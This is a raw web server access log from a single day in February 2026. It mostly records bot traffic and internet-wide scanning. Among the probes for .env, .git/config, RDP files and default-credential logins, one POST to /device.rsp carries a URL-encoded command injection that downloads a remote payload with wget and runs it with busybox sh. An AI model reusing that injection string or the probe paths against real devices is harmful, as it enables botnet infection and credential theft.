Edg/90.0.818.46" "-" +[01/Feb/2026:08:10:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 193.77.238.11] [Length 1033] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36" "-" +[01/Feb/2026:08:11:37 +0000] 404 - POST http 78.131.122.113 "/boaform/admin/formLogin" [Client 124.198.131.145] [Length 122] [Gzip 1.35] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:71.0) Gecko/20100101 Firefox/71.0" "http://78.131.122.113:80/admin/login.asp" +[01/Feb/2026:08:11:37 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 124.198.131.145] [Length 0] [Gzip -] "-" "-" +[01/Feb/2026:08:19:17 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:08:20:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 87.121.84.51] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" "-" +[01/Feb/2026:08:22:27 +0000] 200 - GET http 78.131.122.113 "/" [Client 121.135.217.49] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:08:34:04 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:08:35:56 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:08:36:47 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:08:40:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:08:42:25 +0000] 404 - GET http 78.131.122.113 "/actuator/health" [Client 13.89.124.208] [Length 122] [Gzip 1.35] "Mozilla/5.0 zgrab/0.x" "-" +[01/Feb/2026:08:46:59 +0000] 400 - - http localhost "-" [Client 20.163.6.104] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:08:48:46 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:08:58:10 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:09:15:50 +0000] 400 - GET http 78.131.122.113 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[01/Feb/2026:09:21:55 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:09:26:14 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:09:32:20 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:09:35:46 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:09:37:00 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:09:49:29 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:09:51:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:10:00:21 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 116.62.33.140] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:10:00:22 +0000] 400 - GET http localhost-nginx-proxy-manager "/" [Client 116.62.33.140] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:10:00:22 +0000] 404 - GET http 78.131.122.113 "/web.config" [Client 116.62.33.140] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[01/Feb/2026:10:00:22 +0000] 404 - GET http 78.131.122.113 "/connection.rdp" [Client 116.62.33.140] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[01/Feb/2026:10:00:23 +0000] 404 - GET http 78.131.122.113 "/server.rdp" [Client 116.62.33.140] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[01/Feb/2026:10:00:24 +0000] 404 - GET http 78.131.122.113 "/default.rdp" [Client 116.62.33.140] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[01/Feb/2026:10:00:25 +0000] 404 - GET http 78.131.122.113 "/rdp/connection.rdp" [Client 116.62.33.140] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[01/Feb/2026:10:00:26 +0000] 404 - GET http 78.131.122.113 "/admin.rdp" [Client 116.62.33.140] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[01/Feb/2026:10:00:26 +0000] 404 - GET http 78.131.122.113 "/internal.rdp" [Client 116.62.33.140] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/112.0.5615.137 Safari/537.36" "-" +[01/Feb/2026:10:11:24 +0000] 404 - GET http 78.131.122.113 "/bin/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:10:15:34 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:10:20:20 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 93.174.93.12] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:10:21:43 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:10:27:04 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:10:32:32 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:10:34:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:10:38:15 +0000] 200 - GET http 78.131.122.113 "/" [Client 49.234.4.35] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[01/Feb/2026:10:40:36 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:10:54:23 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:11:03:26 +0000] 200 - GET http localhost-nginx-proxy-manager "/" [Client 216.180.246.160] [Length 1033] [Gzip -] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[01/Feb/2026:11:03:39 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.160] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:11:03:58 +0000] 404 - POST http 78.131.122.113 "/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F176.65.139.21%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc" [Client 176.65.139.20] [Length 122] [Gzip 1.35] "Mozila/5.0" "-" +[01/Feb/2026:11:04:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 216.180.246.160] [Length 568] [Gzip 1.86] "'Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler)'" "-" +[01/Feb/2026:11:04:39 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:11:04:50 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 1033] [Gzip -] "-" "-" +[01/Feb/2026:11:06:37 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:11:10:08 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 216.180.246.160] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:11:10:14 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[01/Feb/2026:11:12:03 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:11:22:29 +0000] 200 - GET http fb.profibot.synology.me "/" [Client 185.12.248.5] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Viewer/99.9.8853.8" "-" +[01/Feb/2026:11:23:00 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:11:23:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:11:25:07 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:11:32:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:11:39:09 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 91.196.152.18] [Length 154] [Gzip -] "-" "-" +[01/Feb/2026:11:39:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 91.196.152.20] [Length 1033] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0" "-" +[01/Feb/2026:11:41:08 +0000] 400 - GET http 78.131.122.113 "/favicon.ico" [Client 127.0.0.1] [Length 230] [Gzip -] "-" "-" +[01/Feb/2026:11:45:10 +0000] 404 - GET http localhost-nginx-proxy-manager "/boaform/admin/formLogin?username=user&psd=user" [Client 223.123.43.70] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:11:52:23 +0000] 200 - GET http 78.131.122.113 "/" [Client 170.64.236.22] [Length 568] [Gzip 1.86] "Mozilla/5.0" "-" +[01/Feb/2026:11:52:23 +0000] 405 - POST http 78.131.122.113 "/" [Client 170.64.236.22] [Length 154] [Gzip -] "Mozilla/5.0" "-" +[01/Feb/2026:11:53:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:11:58:16 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:12:02:26 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:12:03:40 +0000] 400 - GET http 78.131.122.113 "/.env" [Client 159.203.169.243] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[01/Feb/2026:12:03:40 +0000] 400 - GET http 78.131.122.113 "/.git/config" [Client 159.203.169.243] [Length 252] [Gzip -] "Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about);" "-" +[01/Feb/2026:12:16:37 +0000] 200 - GET http 78.131.122.113 "/" [Client 45.117.153.254] [Length 568] [Gzip 1.86] "Go-http-client/1.1" "-" +[01/Feb/2026:12:22:35 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:12:23:50 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:12:25:19 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:12:33:05 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:12:46:12 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:12:56:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:00:25 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 52.169.124.184] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:13:07:29 +0000] 404 - GET http profibot.direct.quickconnect.to "/rip.php" [Client 52.169.124.184] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:13:13:16 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:14:32 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:20:18 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:24:24 +0000] 404 - GET http 78.131.122.113 "/backup/" [Client 204.76.203.18] [Length 150] [Gzip -] "-" "-" +[01/Feb/2026:13:28:15 +0000] 400 - GET http localhost "/" [Client 188.166.166.100] [Length 252] [Gzip -] "-" "-" +[01/Feb/2026:13:28:16 +0000] 400 - GET http 78.131.122.113 "/odinhttpcall1769952495" [Client 188.166.166.100] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:13:28:16 +0000] 400 - POST http 78.131.122.113 "/sdk" [Client 188.166.166.100] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:13:28:17 +0000] 400 - GET http 78.131.122.113 "/HNAP1" [Client 188.166.166.100] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:13:28:17 +0000] 400 - GET http 78.131.122.113 "/evox/about" [Client 188.166.166.100] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:13:28:18 +0000] 400 - GET http localhost "/" [Client 188.166.166.100] [Length 252] [Gzip -] "-" "-" +[01/Feb/2026:13:28:19 +0000] 400 - GET http 78.131.122.113 "/" [Client 188.166.166.100] [Length 252] [Gzip -] "-" "-" +[01/Feb/2026:13:28:19 +0000] 400 - GET http 78.131.122.113 "/query?q=SHOW+DIAGNOSTICS" [Client 165.227.162.253] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:13:28:19 +0000] 400 - GET http 78.131.122.113 "/solr/admin/info/system" [Client 46.101.127.41] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:13:28:19 +0000] 400 - GET http 78.131.122.113 "/v2/_catalog" [Client 167.172.110.232] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:13:28:19 +0000] 400 - GET http 78.131.122.113 "/" [Client 139.59.210.36] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:13:28:19 +0000] 400 - GET http 78.131.122.113 "/cgi-bin/authLogin.cgi" [Client 167.172.177.68] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:13:28:19 +0000] 400 - GET http 78.131.122.113 "/solr/admin/cores?action=STATUS&wt=json" [Client 46.101.127.41] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:13:30:06 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:37:53 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:44:04 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:51:57 +0000] 405 - POST http 78.131.122.113 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[01/Feb/2026:13:57:15 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.69] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:13:59:01 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:14:05:48 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:14:09:31 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.219] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:14:20:00 +0000] 200 - GET http 78.131.122.113 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:14:30:09 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.212] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:14:33:51 +0000] 200 - GET http 78.131.122.113 "/" [Client 204.76.203.206] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:14:40:43 +0000] 200 - GET http 78.131.122.113 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[01/Feb/2026:14:42:42 +0000] 400 - GET http localhost "/" [Client 142.93.96.178] [Length 252] [Gzip -] "-" "-" +[01/Feb/2026:14:42:43 +0000] 400 - POST http 78.131.122.113 "/sdk" [Client 142.93.96.178] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:14:42:43 +0000] 400 - GET http 78.131.122.113 "/odinhttpcall1769956962" [Client 142.93.96.178] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:14:42:44 +0000] 400 - GET http 78.131.122.113 "/HNAP1" [Client 142.93.96.178] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:14:42:44 +0000] 400 - GET http 78.131.122.113 "/evox/about" [Client 142.93.96.178] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:14:42:45 +0000] 400 - GET http localhost "/" [Client 142.93.96.178] [Length 252] [Gzip -] "-" "-" +[01/Feb/2026:14:42:47 +0000] 400 - GET http 78.131.122.113 "/" [Client 142.93.96.178] [Length 252] [Gzip -] "-" "-" +[01/Feb/2026:14:42:47 +0000] 400 - GET http 78.131.122.113 "/v2/_catalog" [Client 167.71.34.54] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:14:42:47 +0000] 400 - GET http 78.131.122.113 "/solr/admin/info/system" [Client 165.227.162.253] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:14:42:47 +0000] 400 - GET http 78.131.122.113 "/cgi-bin/authLogin.cgi" [Client 167.71.34.54] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:14:42:47 +0000] 400 - GET http 78.131.122.113 "/query?q=SHOW+DIAGNOSTICS" [Client 167.172.110.232] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:14:42:47 +0000] 400 - GET http 78.131.122.113 "/" [Client 165.227.162.253] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; Odin; https://docs.getodin.com/)" "-" +[01/Feb/2026:14:42:47 +0000] 400 - GET http 78.131.122.113 "/solr/admin/cores?action=STATUS&wt=json" [Client 165.227.162.253] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[01/Feb/2026:14:52:51 